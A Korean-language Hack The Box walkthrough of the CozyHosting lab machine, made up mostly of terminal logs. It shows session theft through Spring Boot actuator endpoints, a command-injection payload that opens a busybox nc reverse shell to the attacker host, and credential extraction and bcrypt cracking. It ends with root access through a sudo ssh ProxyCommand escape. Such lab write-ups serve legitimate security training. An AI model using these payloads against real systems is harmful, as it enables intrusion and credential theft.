Proof of Concept
10.129.18.74
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open httpInitial Access
80 포트 웹서비스 접속 시 http://cozyhosting.htb으로 리다이렉트 됨
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)/etc/hosts 파일 설정
┌──(kali㉿kali)-[~/CozyHosting]
└─$ cat /etc/hosts
<SNIP>
10.129.18.74 cozyhosting.htb웹 디렉토리 탐색 결과 에러 페이지 발견
┌──(kali㉿kali)-[~/CozyHosting]
└─$ feroxbuster -u http://cozyhosting.htb -t 100
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.13.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://cozyhosting.htb/
🚩 In-Scope Url │ cozyhosting.htb
🚀 Threads │ 100
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 1l 2w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 97l 196w 4431c http://cozyhosting.htb/login
200 GET 43l 241w 19406c http://cozyhosting.htb/assets/img/pricing-business.png
200 GET 29l 131w 11970c http://cozyhosting.htb/assets/img/pricing-free.png
200 GET 34l 172w 14934c http://cozyhosting.htb/assets/img/pricing-starter.png
200 GET 38l 135w 8621c http://cozyhosting.htb/assets/img/favicon.png
200 GET 29l 174w 14774c http://cozyhosting.htb/assets/img/pricing-ultimate.png
200 GET 295l 641w 6890c http://cozyhosting.htb/assets/js/main.js
200 GET 2397l 4846w 42231c http://cozyhosting.htb/assets/css/style.css
200 GET 1l 218w 26053c http://cozyhosting.htb/assets/vendor/aos/aos.css
204 GET 0l 0w 0c http://cozyhosting.htb/logout
200 GET 79l 519w 40905c http://cozyhosting.htb/assets/img/values-2.png
200 GET 38l 135w 8621c http://cozyhosting.htb/assets/img/logo.png
200 GET 1l 313w 14690c http://cozyhosting.htb/assets/vendor/aos/aos.js
200 GET 81l 517w 40968c http://cozyhosting.htb/assets/img/hero-img.png
200 GET 83l 453w 36234c http://cozyhosting.htb/assets/img/values-3.png
500 GET 1l 1w 73c http://cozyhosting.htb/error
<SNIP>http://cozyhosting.htb/error 페이지 접속 시 “Whitelabel Error Page”라는 문구를 볼 수 있으며, 해당 문구는 Spring Boot에서 발생하는 오류 문구임을 확인
<html><body><h1>Whitelabel Error Page</h1><p>This application has no explicit mapping for /error, so you are seeing this as a fallback.</p><div id='created'>Sun Feb 08 15:33:37 UTC 2026</div><div>There was an unexpected error (type=None, status=999).</div></body></html>Spring Boot endpoint 워드리스트 다운로드
┌──(kali㉿kali)-[/usr/share/seclists/Discovery/Web-Content]
└─$ sudo wget https://git.selfmade.ninja/zer0sec/SecLists/-/raw/master/Discovery/Web-Content/spring-boot.txt
[sudo] password for kali:
--2026-02-08 10:51:24-- https://git.selfmade.ninja/zer0sec/SecLists/-/raw/master/Discovery/Web-Content/spring-boot.txt
Resolving git.selfmade.ninja (git.selfmade.ninja)... 95.111.201.95
Connecting to git.selfmade.ninja (git.selfmade.ninja)|95.111.201.95|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1890 (1.8K) [text/plain]
Saving to: ‘spring-boot.txt’
spring-boot.txt 100%[===================================================================================================>] 1.85K --.-KB/s in 0s
2026-02-08 10:51:25 (6.55 MB/s) - ‘spring-boot.txt’ saved [1890/1890]Spring Boot 엔드포인트 열거
┌──(kali㉿kali)-[~/CozyHosting]
└─$ feroxbuster -u http://cozyhosting.htb -t 100 -w /usr/share/wordlists/seclists/Discovery/Web-Content/spring-boot.txt -q -s 200
200 GET 1l 1w 15c http://cozyhosting.htb/actuator/health
200 GET 1l 1w 48c http://cozyhosting.htb/actuator/sessions
200 GET 1l 1w 634c http://cozyhosting.htb/actuator
200 GET 1l 13w 487c http://cozyhosting.htb/actuator/env/lang
200 GET 1l 120w 4957c http://cozyhosting.htb/actuator/env
200 GET 1l 13w 487c http://cozyhosting.htb/actuator/env/home
200 GET 1l 13w 487c http://cozyhosting.htb/actuator/env/path
200 GET 1l 108w 9938c http://cozyhosting.htb/actuator/mappings
200 GET 38l 135w 8621c http://cozyhosting.htb/assets/img/favicon.png
200 GET 38l 135w 8621c http://cozyhosting.htb/assets/img/logo.png
200 GET 295l 641w 6890c http://cozyhosting.htb/assets/js/main.js
200 GET 34l 172w 14934c http://cozyhosting.htb/assets/img/pricing-starter.png
200 GET 29l 131w 11970c http://cozyhosting.htb/assets/img/pricing-free.png
200 GET 29l 174w 14774c http://cozyhosting.htb/assets/img/pricing-ultimate.png
200 GET 73l 470w 37464c http://cozyhosting.htb/assets/img/values-1.png
200 GET 97l 196w 4431c http://cozyhosting.htb/login
200 GET 43l 241w 19406c http://cozyhosting.htb/assets/img/pricing-business.png
200 GET 1l 542w 127224c http://cozyhosting.htb/actuator/beans
200 GET 1l 218w 26053c http://cozyhosting.htb/assets/vendor/aos/aos.css
200 GET 79l 519w 40905c http://cozyhosting.htb/assets/img/values-2.png
200 GET 1l 313w 14690c http://cozyhosting.htb/assets/vendor/aos/aos.js
200 GET 83l 453w 36234c http://cozyhosting.htb/assets/img/values-3.png
200 GET 2397l 4846w 42231c http://cozyhosting.htb/assets/css/style.css
200 GET 1l 625w 55880c http://cozyhosting.htb/assets/vendor/glightbox/js/glightbox.min.js
200 GET 7l 1222w 80420c http://cozyhosting.htb/assets/vendor/bootstrap/js/bootstrap.bundle.min.js
200 GET 81l 517w 40968c http://cozyhosting.htb/assets/img/hero-img.png
200 GET 14l 1684w 143706c http://cozyhosting.htb/assets/vendor/swiper/swiper-bundle.min.js
200 GET 2018l 10020w 95609c http://cozyhosting.htb/assets/vendor/bootstrap-icons/bootstrap-icons.css
200 GET 7l 2189w 194901c http://cozyhosting.htb/assets/vendor/bootstrap/css/bootstrap.min.css
200 GET 285l 745w 12706c http://cozyhosting.htb/
Scanning: http://cozyhosting.htb/ /actuator/sessions 엔드포인트에서 kanderson 사용자 세션 획득
┌──(kali㉿kali)-[~/CozyHosting]
└─$ curl http://cozyhosting.htb/actuator/sessions
{"36A94B2FB8F3C82868F8CFB4E96BA113":"kanderson"} 해당 세션을 이용하여 amdin 페이지 접근 성공
┌──(kali㉿kali)-[~/CozyHosting]
└─$ curl -X GET http://cozyhosting.htb/admin \
-H "Cookie: JSESSIONID=36A94B2FB8F3C82868F8CFB4E96BA113" -I
HTTP/1.1 200
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 09 Feb 2026 12:01:05 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Content-Language: en-USadmin 페이지에서 submit 버튼 클릭 시 host,username 파라미터와 함께 /executessh 엔드포인트로 요청 보내는 것을 확인
<form action="/executessh" method="post">
<div class="row mb-3">
<label class="col-sm-2 col-form-label">Connection settings</label>
<div class="col-sm-10">
<div class="form-floating mb-3">
<input name="host" class="form-control" id="host" placeholder="example.com">
<label for="host">Hostname</label>
</div>
<div class="form-floating mb-3">
<input name="username" class="form-control" id="username" placeholder="user">
<label for="username">Username</label>
</div>
</div>
</div>
<div class="text-center">
<button type="submit" class="btn btn-primary">Submit</button>
<button type="reset" class="btn btn-secondary">Reset</button>
</div>
</form>username 파라미터에서 Command Injection 취약점 발견
- request
┌──(kali㉿kali)-[~/CozyHosting]
└─$ curl http://cozyhosting.htb/executessh -H "Cookie: JSESSIONID=36A94B2FB8F3C82868F8CFB4E96BA113" -d 'host=127.0.0.1&username=root;curl${IFS}http://10.10.14.17:5555;'- response
┌──(kali㉿kali)-[~/CozyHosting]
└─$ rlwrap nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.14.17] from (UNKNOWN) [10.129.18.74] 33640
GET / HTTP/1.1
Host: 10.10.14.17:5555
User-Agent: curl/7.81.0
Accept: */*Command Injection 취약점을 이용해서 리버스쉘 연결 명령 실행
┌──(kali㉿kali)-[~/CozyHosting]
└─$ curl http://cozyhosting.htb/executessh \
-H "Cookie: JSESSIONID=36A94B2FB8F3C82868F8CFB4E96BA113" \
-d 'host=127.0.0.1&username=root;busybox${IFS}nc${IFS}10.10.14.17${IFS}4444${IFS}-e${IFS}sh;'
리버스쉘 연결 성공
┌──(kali㉿kali)-[~/CozyHosting]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.129.18.74] 32774Lateral Movement
/app 디렉토리에서 cloudhosting-0.0.1.jar 파일 발견
app@cozyhosting:/app$ ls -al
ls -al
total 58856
drwxr-xr-x 2 root root 4096 Aug 14 2023 .
drwxr-xr-x 19 root root 4096 Aug 14 2023 ..
-rw-r--r-- 1 root root 60259688 Aug 11 2023 cloudhosting-0.0.1.jarcloudhosting-0.0.1.jar 파일 압축 해제
┌──(kali㉿kali)-[~/CozyHosting/cloudhosting]
└─$ unzip cloudhosting-0.0.1.jar
Archive: cloudhosting-0.0.1.jar
creating: META-INF/
inflating: META-INF/MANIFEST.MF
creating: org/
creating: org/springframework/
creating: org/springframework/boot/
creating: org/springframework/boot/loader/
inflating: org/springframework/boot/loader/ClassPathIndexFile.class
inflating: org/springframework/boot/loader/ExecutableArchiveLauncher.class
inflating: org/springframework/boot/loader/JarLauncher.class
inflating: org/springframework/boot/loader/LaunchedURLClassLoader$DefinePackageCallType.class
inflating: org/springframework/boot/loader/LaunchedURLClassLoader$UseFastConnectionExceptionsEnumeration.class
inflating: org/springframework/boot/loader/LaunchedURLClassLoader.class
inflating: org/springframework/boot/loader/Launcher.class
inflating: org/springframework/boot/loader/MainMethodRunner.class
inflating: org/springframework/boot/loader/PropertiesLauncher$ArchiveEntryFilter.class
inflating: org/springframework/boot/loader/PropertiesLauncher$ClassPathArchives.class
inflating: org/springframework/boot/loader/PropertiesLauncher$PrefixMatchingArchiveFilter.class
inflating: org/springframework/boot/loader/PropertiesLauncher.class
inflating: org/springframework/boot/loader/WarLauncher.class
creating: org/springframework/boot/loader/archive/
inflating: org/springframework/boot/loader/archive/Archive$Entry.class
inflating: org/springframework/boot/loader/archive/Archive$EntryFilter.class
inflating: org/springframework/boot/loader/archive/Archive.class
<SNIP>압축 해제한 파일들 중 ./BOOT-INF/classes/application.properties에서 비밀번호 발견
- Vg&nvzAQ7XxR
┌──(kali㉿kali)-[~/CozyHosting/cloudhosting]
└─$ grep -i -r password .
./BOOT-INF/classes/application.properties:spring.datasource.password=Vg&nvzAQ7XxR
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.symbol.svg:</symbol><symbol viewBox="0 0 24 24" id="ri-lock-password-fill">
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.symbol.svg:</symbol><symbol viewBox="0 0 24 24" id="ri-lock-password-line">
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.svg: <glyph glyph-name="lock-password-fill"
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.svg: <glyph glyph-name="lock-password-line"
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css:.ri-lock-password-fill:before { content: "\eecf"; }
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css:.ri-lock-password-line:before { content: "\eed0"; }
grep: ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.eot: binary file matches
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.less:.ri-lock-password-fill:before { content: "\eecf"; }
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.less:.ri-lock-password-line:before { content: "\eed0"; }
grep: ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.ttf: binary file matches
grep: ./BOOT-INF/classes/htb/cloudhosting/scheduled/FakeUser.class: binary file matches
<SNIP>./BOOT-INF/classes/application.properties 파일에서 DB 접속 정보 발견
- postgres:Vg&nvzAQ7XxR
┌──(kali㉿kali)-[~/CozyHosting/cloudhosting]
└─$ cat ./BOOT-INF/classes/application.properties
server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.driver-class-name=org.postgresql.Driver
spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect
spring.jpa.hibernate.ddl-auto=none
spring.jpa.database=POSTGRESQL
spring.datasource.platform=postgres
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR 알아낸 DB 접속 정보로 postgres DB 접속 성공
app@cozyhosting:/app$ psql -h 127.0.0.1 -p 5432 -U postgres
psql -h 127.0.0.1 -p 5432 -U postgres
Password for user postgres: Vg&nvzAQ7XxR
psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.
postgres=#DB 목록 나열
postgres=# SELECT datname FROM pg_database;
SELECT datname FROM pg_database;
datname
-------------
postgres
cozyhosting
template1
template0
(4 rows)cozyhosting 데이터베이스 내 hosts, users 테이블 존재
postgres=# \c cozyhosting
\c cozyhosting
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
You are now connected to database "cozyhosting" as user "postgres".
cozyhosting=# \dt
List of relations
Schema | Name | Type | Owner
--------+-------+-------+----------
public | hosts | table | postgres
public | users | table | postgres
(2 rows)users 테이블에서 관리자 계정 패스워드 해시값 발견
cozyhosting=# select * from users;
select * from users;
name | password | role
-----------+--------------------------------------------------------------+-------
kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
admin | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin
(2 rows)해시 크랙
- manchesterunited
┌──(kali㉿kali)-[~/CozyHosting/cloudhosting]
└─$ hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt --quiet
$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm:manchesterunited쉘 접속 가능한 사용자 josh 확인
app@cozyhosting:/app$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
<SNIP>
app:x:1001:1001::/home/app:/bin/sh
postgres:x:114:120:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
josh:x:1003:1003::/home/josh:/usr/bin/bash
_laurel:x:998:998::/var/log/laurel:/bin/false이전에 획득한 비밀번호를 사용하여 josh 사용자로 SSH 접속
┌──(kali㉿kali)-[~/CozyHosting/cloudhosting]
└─$ sshpass -p 'manchesterunited' ssh josh@10.129.18.74
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-82-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Feb 9 01:06:01 PM UTC 2026
System load: 0.0078125
Usage of /: 54.1% of 5.42GB
Memory usage: 14%
Swap usage: 0%
Processes: 247
Users logged in: 0
IPv4 address for eth0: 10.129.18.74
IPv6 address for eth0: dead:beef::250:56ff:feb0:8052
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Aug 29 09:03:34 2023 from 10.10.14.41
josh@cozyhosting:~$Read user.txt
josh@cozyhosting:~$ cat user.txt
7e8b933b96ee3ef6d689cfb1756a4d8d
josh@cozyhosting:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:80:52 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.129.18.74/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 2456sec preferred_lft 2456sec
inet6 dead:beef::250:56ff:feb0:8052/64 scope global dynamic mngtmpaddr
valid_lft 86397sec preferred_lft 14397sec
inet6 fe80::250:56ff:feb0:8052/64 scope link
valid_lft forever preferred_lft foreverPrivilege Escalation
sudo 권한 확인
- root 권한으로 ssh 명령어 실행 가능
josh@cozyhosting:~$ sudo -l
[sudo] password for josh:
Matching Defaults entries for josh on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User josh may run the following commands on localhost:
(root) /usr/bin/ssh *root 권한으로 실행 가능한 ssh 명령어를 악용하여 root 권한 쉘 실행
josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';/bin/sh 0<&2 1>&2' x
# id
uid=0(root) gid=0(root) groups=0(root)Read root.txt
# cat root.txt
97ea88dce79b4d31142b51be3a0381a9
# ip ad
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:80:52 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.129.18.74/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 2217sec preferred_lft 2217sec
inet6 dead:beef::250:56ff:feb0:8052/64 scope global dynamic mngtmpaddr
valid_lft 86397sec preferred_lft 14397sec
inet6 fe80::250:56ff:feb0:8052/64 scope link
valid_lft forever preferred_lft forever